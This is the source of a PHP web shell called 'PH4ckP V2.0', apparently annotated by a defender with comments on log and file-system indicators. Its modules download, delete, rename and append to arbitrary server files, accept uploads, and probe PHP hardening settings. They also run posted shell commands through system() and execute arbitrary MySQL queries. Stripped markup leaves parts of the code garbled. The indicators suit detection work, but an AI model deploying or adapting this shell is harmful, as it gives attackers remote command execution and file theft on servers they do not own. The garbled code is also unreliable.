// Web-shell download handler: sends the file named by $downfile to the client as an attachment.
// $downfile is never assigned in the visible code. The file listing further down builds links of
// the form ?downfile=<dir>/<file>, so the value is presumably request-controlled (register_globals
// or an import outside this view -- confirm against the full sample).
// Defender notes: this block contains no access check and no path restriction, so any file the
// web-server account can read can leave the host through it. Requests carrying a `downfile`
// parameter that are answered with Content-Disposition: attachment are a usable web-log signal.
if
($downfile) {@set_time_limit(600);
// basename() only shortens the name shown to the client; readfile() below still gets the full path.
$filename = basename($downfile);
$filesize = filesize($downfile);
// $filename is concatenated into response headers without quoting or escaping.
header("Content-Type: application/force-download;
name=".$filename);
header("Content-Transfer-Encoding: binary");
header("Content-Length: $filesize");
header("Content-Disposition: attachment;
filename=".$filename);
header("Expires: 0");
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
// The unvalidated path is streamed verbatim; exit() stops the rest of the page from rendering.
readfile("$downfile");
exit();
}
// Web-shell delete handler: unlinks the path held in $delfile and reports the outcome.
// $delfile is not assigned in the visible code; the [Delete] links of the file listing pass it as
// &delfile=<dir>/<file>, so it is presumably request-controlled -- confirm against the full sample.
// Defender notes: no access check in this block; deletions run with the web-server account's
// rights. File-integrity monitoring and web logs containing a `delfile` parameter are the
// artifacts to correlate.
if($delfile!=""){
// is_file() is the only gate: it rejects directories and missing paths, not locations.
if(is_file($delfile)){
// '@' suppresses the warning PHP would raise if unlink() fails; only the ternary result is shown.
$message = (@unlink($delfile))
? "The deletion document succeeds!`$delfile` Already
deleted!"
: "The deletion document is defeated!`$delfile` The document
exists!" ;
}else{
$message = "File `$delfile` does not exist!";
}
}
// $delfile is interpolated into $message and echoed without HTML escaping.
// $message is echoed on every request, including those where no delete was asked for.
echo $message;
// Web-shell rename handler. The HTML that used to sit inside the echo strings was stripped during
// extraction and several quotes no longer pair up, so the code is left exactly as found and only
// this header note is added.
// What the surviving statements show: $refilename (passed by the listing's [Rename] links as
// ?refilename=<dir>/<file>) is reduced to a base name, and rename() is then called with that name
// as the source and the raw POST field `newname` as the destination. The source is therefore
// resolved against the working directory; the destination is not validated in any way.
// Defender notes: '@' suppresses rename() warnings, and this block contains no access check.
// POST bodies carrying `newname` together with a `refilename` query parameter identify this path.
if ($refilename){
echo
'
echo '
method="post">';
echo '
';
echo '
';echo '
';echo '';
echo 'Enter the newname to here:';
echo '
name="newname"/>';
echo '
value="Rename"/>';
echo '
';echo'';echo
'
';$oldname=basename($refilename);
if (@rename($oldname,$_POST['newname'])){
echo
'';}
else
{ if
(!empty($_POST['newname']))
echo
'';}
}
// Web-shell file-edit ("inject") handler. As with the rename form, the markup inside the echo
// strings was stripped in extraction and the quoting is no longer balanced, so the code is left
// untouched and only this header note is added.
// Surviving logic: $editfile (from the listing's [Injects] links, ?editfile=<dir>/<file>) is
// reduced to a base name, opened with mode "a+", its current contents are read and echoed, and a
// non-empty POST field `newcontent` is written through the same handle.
// NOTE(review): mode "a+" appends, so the write adds to the file instead of replacing it; that
// matches the "injection" wording of the status message.
// Defender notes: file contents are echoed and POST data is written without escaping or
// validation, and fopen/fread/fwrite warnings are suppressed with '@'. Unexpected size or mtime
// changes on files in the script's working directory are the artifact to look for.
if ($editfile) {
echo
'
echo
'
method="post">';
echo
'';
echo
'
';$content=basename($editfile);
$fp=@fopen("$content","a+");
$data=@fread($fp,filesize($content));
echo
'
';echo
'
>';
echo
$data;
if
(!empty($_POST['newcontent']))
{echo
$result=$result=@fwrite($fp,$_POST['newcontent'])?"The
injection document succeeds!Good Luck!":"The injection document is
defeated!";
}
}
echo
'
';?>
PH4ckP V2.0 β Bypr0cess
body {font-family: "sans-serif", "serif"; font-size: 12px;}
BODY { background-color:#A2B5CD }
a:link {color: #BFEFFF; text-decoration: none}
a:visited {color: #080808; text-decoration: none}
a:hover {color: #FFFFFF; text-decoration: underline}
input {font-family: "sans-serif", "serif";font-size: 12px;}
td {font-family: "sans-serif", "Verdana"; font-size: 12px;}
.title {font-family: "Verdana", "Tahoma";font-size:
20px;font-weight: bold; color=black}
align="center">PH4ckP V2.0 β |
action="=$PHP_SELF?>"
method="get">
Operatingsystem:<?echo
PHP_OS;?>
Servername:<?echo
$_SERVER['SERVER_NAME'];?>
ServerIP:<?echo
gethostbyname($_SERVER['SERVER_NAME']);?>
Servertime:<?echo date("Y年m月d日
h:i:s",time());?>
Serverport :<?echo
$_SERVER['SERVER_PORT'];?>
href=http://translate.google.com/translate_t>Click
here to translate online
href="?shell=env">『PHP探针模块』 | href="?shell=checkdir">『目录浏览模块[快速]』 | href="?shell=command">『命令执行模块』 | href="?shell=sql">『数据库操作模块』 | href="?shell=change">『字符转换模块』 |
/table>
Current dir of contents:<?php /* $dir defaults to this script's own directory; otherwise it is taken verbatim from the `dir` query parameter and echoed without HTML escaping. The else branch is only reachable if $dir was already set before this point (nothing visible here sets it -- presumably imported from the request). The same value later feeds opendir(), so the browsable tree is whatever the web-server account can read. */ if (!isset($dir) or empty($dir)) { $dir=str_replace('\\','/',dirname(__FILE__)); echo " color=\"#00688B\">".$dir." ";} else { $dir=$_GET['dir']; echo " color=\"#00688B\">".$dir." ";} ?> |
method="post"> UploadFile: style="font-family:Verdana,Arial; font-size: 9pt;"> style="font-family:Verdana,Arial; font-size: 9pt;background-color:#A2B5CD"> //文件上传 $upload_file=$_FILES['upload_file']['tmp_name']; $upload_file_name=$_FILES['upload_file']['name']; if($upload_file){ $file_size_max = 1000*1000; $store_dir = "__FILE__"; $accept_overwrite = 1; if ($upload_file_size > $file_size_max) { echo "兄弟!换个小点滴!!"; exit; } if (file_exists($store_dir . $upload_file_name) && !$accept_overwrite) { Echo "文件已存在!"; exit; } if (!move_uploaded_file($upload_file,$upload_file_name)) { echo "上传文件失败!"; exit; } } Echo " Uploaded file:"; echo $_FILES['upload_file']['name']; Echo "Uploadfilesiza:"; echo $_FILES['upload_file']['size']/1024; $Erroe=$_FILES['upload_file']['error']; switch($Erroe){ case 0: Echo "Loading..."; break; case 1: Echo "上传的文件超过限制!"; break; case 2: Echo "上传文件的大小超过限制!"; break; } echo ' |
echo '';
echo '
';?>
// Directory browser, part 1: prints the "go to directory" form (its markup was stripped in
// extraction) and then lists the sub-directories of $dir as links back to this script
// (?dir=<path>). $dir comes from the `dir` query parameter or defaults to the script's directory.
// Defender notes: nothing confines $dir to the web root, so the listing reaches any directory the
// web-server account can read. Repeated GETs to one script with a changing `dir` parameter are a
// typical browsing trace in access logs.
echo '
cellpadding="3">';
echo '
method="get">';
echo '
';echo
'
';echo "The dir of contents glances over:";
echo '
style="font-family:Verdana,Arial; font-size:
9pt;">';
echo '
style="font-family:Verdana,Arial; font-size:
9pt;background-color:#A2B5CD ">';
echo
'
';echo
'
';echo '
';echo '
cellspacing="1">';
echo '
';echo
'
';echo"Sub-Dir of contents";echo
'
';echo '
';$dirs=@opendir($dir);
// '@' hides opendir/readdir/is_dir warnings, so an unreadable path just produces an empty list.
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
// Loose comparison: is_dir() returns a bool, and true == "1".
if($a=="1"){
if($file!=".."&&$file!=".") {
// Path parts are URL-encoded in the href, but $file is printed as link text without HTML escaping.
echo "
\n";echo "
href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">$file
\n";echo "
\n";} else {
// ".." becomes the "go up one level" link; "." is skipped.
if($file=="..")
echo "
href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">Back
higher authority dir of
contents
";}
}
}
@closedir($dirs);
?>
cellspacing="1">
Filename Filedate Filesize Fileoperates$dirs=@opendir($dir);
// Directory browser, part 2: for every non-directory entry of $dir, prints name, timestamp and
// size, followed by four action links that call back into this script with the query parameters
// downfile, delfile, refilename and editfile.
// Defender notes: these four parameter names, together with `dir` and `shell`, are fixed strings
// in this sample and serve as web-log and WAF indicators for it.
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
// Loose comparison: is_dir() returned false, and false == "0".
if($a=="0"){
// Size in KiB as a float; '@' hides the stat warning on unreadable entries.
$size=@filesize("$dir/$file")/1024;
// filectime() is the inode change time, not the last modification time.
$lastsave=@date("Y-n-d
H:i:s",filectime("$dir/$file"));
// NOTE(review): "$sizeKB" below interpolates a variable named $sizeKB, which nothing visible sets;
// either markup between "$size" and "KB" was lost in extraction or the size column prints empty.
// $file is written into the page without HTML escaping.
echo
"
\n";echo
"
$file\n";echo "
$lastsave\n";echo
"
$sizeKB
\n";echo "
href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">[Down]
href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode
($file)."\">[Delete]
href=\"?refilename=".urlencode($dir)."/".urlencode($file)."\">
[Rename]
href=\"?editfile=".urlencode($dir)."/".urlencode($file)."\">[Injects]
\n";echo
"
\n";}
}
@closedir($dirs);
?>
// Probes whether $dir is writable by actually creating a file in it and deleting it again.
// Returns the string "ture" (sic; any non-empty string is truthy) on success. On failure the
// function never returns: `or` binds more loosely than `=`, so `$wriable=false` is evaluated
// first and die() then always runs, ending the whole request with the "Cannot open" message.
// Defender notes: each call briefly creates and removes a temp file whose name is derived from
// the prefix "test_file", which shows up in file-system auditing. tempnam() can fall back to the
// system temp directory when $dir is unusable, so the probe may test a different directory.
function dir_wriable($dir){
$xY7_test=tempnam("$dir","test_file");
// '@' hides the fopen warning; the file is opened for writing only to prove it can be.
if ($fp=@fopen($xY7_test,"w")){
@fclose($fp);
@unlink($xY7_test);
$wriable="ture";
}
else {
// Terminates the script here; the temp-file path is printed in the message.
$wriable=false or die ("Cannot open $xY7_test!");
}
return $wriable;
}
// Runs the write probe against the directory holding this script and prints the result.
// $dir_wriable (the variable) is assigned here but not read anywhere in the visible code.
// Defender note: an upload or edit step needs a writable directory, so this line reports whether
// the web-server account can write next to the script.
if (dir_wriable(str_replace('//','/',dirname(__FILE__)))){
// Label: "directory writable". Echoed text: "Current directory is writable!"
$dir_wriable='目录可写';
echo
"当前目录可写!^ _
^";
}
else{
// Label: "directory not writable". Echoed text: "Current directory is not writable!"
$dir_wriable='目录不可写';
echo
"当前目录不可写!";
}
// Turns a probe result into a coloured YES/NO HTML fragment (the surrounding tag text was partly
// stripped in extraction, which is why the strings start with a bare `color=` attribute).
// Callers in this file pass get_cfg_var() values and function_exists() results.
// The `echo` that follows the closing brace on the same line is the start of the next top-level
// statement, not part of the function.
function getinfo($xy7)
{
// Loose comparison: true, 1 and "1" all select the YES fragment; everything else is NO.
if($xy7==1)
{
$s='
color=blue>YES√
';}
else
{
$s='
color=red>NO×
';}
return $s;
} echo
'
';
// Environment report: prints host identity, PHP runtime details, php.ini limits and which
// extensions are present. The condition that opens this branch is not in the visible text; the
// navigation bar links it as ?shell=env ("PHP probe module"), so it is presumably that branch.
// Every label below is a runtime string and is left as found; English glosses are given in
// comments only.
// Defender notes: the page discloses disable_functions, safe_mode and allow_url_fopen, i.e. which
// PHP hardening is in effect on the host. A response body containing this set of labels together
// is a content signature for the sample. All values are echoed without HTML escaping.
echo '
';
// Host identity: server OS, server name, web port, server time, resolved server IP.
echo "服务器系统:" ;
echo PHP_OS;
echo '
';
echo "服务器域名:";
echo $_SERVER['SERVER_NAME'];
echo '
';
echo "WEB服务器端口:";
echo $_SERVER['SERVER_PORT'];
echo '
';
echo "服务器时间:";
echo date("Y年m月d日 h:i:s",time());
echo '
';
echo "服务器IP地址:";
echo
gethostbyname($_SERVER['SERVER_NAME']);
echo '
';
// Labelled "server OS text encoding", but the value is the client's Accept-Language request
// header, so it is request-controlled and echoed unescaped. Next line: server software.
echo "服务器操作系统文字编码:";
echo $_SERVER['HTTP_ACCEPT_LANGUAGE'];
echo '
';
echo "服务器解释引擎:";
echo $_SERVER['SERVER_SOFTWARE'];
echo '
';
// PHP runtime: SAPI name, PHP version, Zend version, absolute path of this file, free disk space.
echo "PHP运行方式:";
echo strtoupper(php_sapi_name());
echo '
';
echo "PHP版本:";
echo PHP_VERSION;
echo '
';
echo "ZEND版本:";
echo zend_version();
echo '
';
echo "本文件绝对路径:";
echo __FILE__;
echo '
';
echo "服务器剩余空间:";
echo intval(diskfreespace(".") / (1024 *
1024)).'MB';
echo '
';
// php.ini limits: memory_limit and upload_max_filesize.
echo "脚本运行可占最大内存:";
echo get_cfg_var("memory_limit");
echo '
';
echo "脚本上传文件大小限制:";
echo get_cfg_var("upload_max_filesize");
echo '
';
// "Blocked functions": prints the disable_functions list, then post_max_size and
// max_execution_time (suffix means "seconds").
echo "被屏蔽函数:";
echo get_cfg_var("disable_functions");
echo '
';
echo "POST方法提交限制:";
echo get_cfg_var("post_max_size");
echo '
';
echo "脚本超时时间:";
echo
get_cfg_var("max_execution_time")."秒";
echo '
';
// Boolean settings shown as YES/NO via getinfo(): enable_dl, register_globals, display_errors,
// safe_mode.
echo "动态链接库:";
echo getinfo(get_cfg_var("enable_dl"));
echo '
';
echo "自定义全局变量:";
echo
getinfo(get_cfg_var("register_globals"));
echo '
';
echo "显示错误信息:";
echo
getinfo(get_cfg_var("display_errors"));
echo '
';
echo "PHP安全模式:";
echo getinfo(get_cfg_var("safe_mode"));
echo '
';
// Labelled "FTP file transfer", but the call is get_magic_quotes_gpc() with a stray argument; it
// does not test FTP support. That function was removed in PHP 8. Next line: allow_url_fopen.
echo "FTP文件传输:";
echo getinfo(get_magic_quotes_gpc("FTP
support"));
echo '
';
echo"允许使用URL打开文件:";
echo
getinfo(get_cfg_var("allow_url_fopen"));
echo '
';
// Capability checks via function_exists(): sessions, sockets (fsockopen), MySQL, SQL Server,
// ODBC, Oracle, SNMP.
echo "SESSION支持:";
echo
getinfo(function_exists("session_start"));
echo '
';
echo "Socket支持:";
echo
getinfo(function_exists("fsockopen"));
echo '
';
echo "MYSQL数据库:";
echo
getinfo(function_exists("mysql_close"));
echo '
';
echo "SQL SERVER数据库:";
echo
getinfo(function_exists("mssql_close"));
echo '
';
echo "ODBC数据库:";
echo
getinfo(function_exists("odbc_close"));
echo '
';
echo "Oracle数据库:";
echo
getinfo(function_exists("ora_close"));
echo '
';
echo "SNMP协议:";
echo getinfo(function_exists("snmpget"));
echo '
';
echo '
';
// Closes the branch whose opening condition lies outside the visible text.
}
// ?shell=checkdir branch ("quick directory browse"): lists the directory named by the POST field
// `dir` into a textarea. The form markup was stripped in extraction.
// Defender notes: the path is used as posted, with no confinement to the web root and no access
// check in this block. Entry names are echoed without HTML escaping. POSTs to this script with
// ?shell=checkdir identify the feature in web logs.
elseif ($_GET['shell']=="checkdir"){
global $PHP_SELF;
echo '
method="post">';
// Label: "Quick directory browse:"
echo "快速目录浏览:";
echo '
name="dir" style="font-family:Verdana,Arial; font-size:
9pt;"/>';
echo '
value="GoTo" style="font-family:Verdana,Arial; font-size: 9pt;
background-color:#A2B5CD"/>';
echo '
';
echo '
cols="70" rows="15">';
// Falls back to the working directory when no `dir` was posted.
if (empty($_POST['dir']))
$newdir="./";
else
$newdir=$_POST['dir'];
// '@' hides the warning for unreadable paths; the resource handle itself is printed next.
$handle=@opendir($newdir);
echo "handle: $handle\n";
// The loop stops early on an entry whose name is falsy (for example "0").
while ($file=@readdir($handle))
{echo
("$file \n");}
echo
'
';echo '
';
// $nowdir is assigned but not read anywhere in the visible code.
$nowdir=dirname($PHP_SELF);
}
// ?shell=command branch ("command execution module"). The form markup was stripped in extraction
// and the first echo string lost its closing quote, so the code is left exactly as found and only
// this header note is added.
// What the surviving statements show: the POST field `cmd` is handed unmodified to system(), and
// the command's output is streamed into the page (originally inside a read-only textarea). '@'
// suppresses the PHP warning, and this block contains no access check.
// Defender notes: the reliable host-side signal is the web-server or PHP worker process spawning
// a shell or other child process; audit process creation for that parent/child pair. In web logs,
// look for POSTs to one script with ?shell=command. Listing system() and the related
// process-execution functions in php.ini's disable_functions blocks this call.
elseif ($_GET['shell']=="command"){
echo '
echo '
method="post">';
echo '
';
echo '
';echo '
';echo 'Enter your command:';
echo '
style="font-family:Verdana,Arial; font-size:
9pt;"/>';
echo '
style="font-family:Verdana,Arial; font-size:
9pt;background-color:#A2B5CD"/>';
echo '
';echo'';
echo '
';echo '
';echo '
readonly>';
@system($_POST['cmd']);
echo
'
';}
// ?shell=change branch ("character conversion module"): hex-encodes the POST field `char` and
// prints it with a "0x" prefix. The form markup was stripped in extraction.
// Unlike the other branches, nothing here touches the file system, a database or a process.
elseif ($_GET['shell']=="change"){
echo '
method="post">';
echo '
';
echo "Enter binary character:";
echo '
style="font-family:Verdana,Arial; font-size:
9pt;"/>';
echo '';
echo '
';echo '
readonly>';
// bin2hex() output consists only of [0-9a-f], so this echo cannot carry markup from the request.
$result=bin2hex($_POST['char']);
echo "0x".$result;
echo
'
';}
// ?shell=sql branch ("database operation module"): a MySQL client form. The markup inside the
// echo strings, including the input names, was stripped in extraction.
// $servername, $username, $password and $dbname are never assigned in the visible code; they
// presumably arrive as posted form fields imported into globals -- confirm against the full sample.
// The mysql_* functions used here were removed in PHP 7, so this branch only works on older
// runtimes.
// Defender notes: this branch makes the web server open database connections with
// operator-supplied host and credentials and run the POST field `query` verbatim. Outbound
// database connections from the web tier to hosts it does not normally talk to, and POSTs to
// ?shell=sql, are the signals to look for.
elseif ($_GET['shell']=="sql"){
echo '
cellSpacing=8 cellPadding=4>';
echo
'
';echo '
method="post">';
echo "Host:";
echo '
type="text" style="font-family:Verdana,Arial; font-size:
9pt;">';
echo
'
';echo "Username:";
echo '
type="text" style="font-family:Verdana,Arial; font-size:
9pt;">';
echo
'
';echo
'
';echo "Password:";
echo '
type="text" style="font-family:Verdana,Arial; font-size:
9pt;">';
echo
'
';echo "DBname:";
echo '
type="text" style="font-family:Verdana,Arial; font-size:
9pt;">';
echo '
value="Connect" style="font-family:Verdana,Arial; font-size: 9pt;
background-color:#A2B5CD"/>';
echo
'
';if
(@mysql_connect($servername,$username,$password) and
@mysql_select_db($dbname)) {
echo "The database connects successfully!";
mysql_close();
} else {
echo mysql_error();
}
// NOTE(review): the guard tests $dbresult before anything visible assigns it, and the status line
// tests $result rather than $dbresult; as written the reported outcome does not reflect the query.
if (!empty($dbresult)){
// The posted SQL text is executed as is; the connection above has already been closed.
$dbresult = @mysql_query($_POST['query']);
echo ($result) ? "Requests successfully!" : "The request makes a
mistake: ".mysql_error();
mysql_close();}
echo
'
';echo '
rows="10">';
echo '
';echo
'
';echo '
align="center">';
echo '';
echo
'
';echo '
';}
?>
align="center">
Copyright (C) 2006 All Rights
Reserved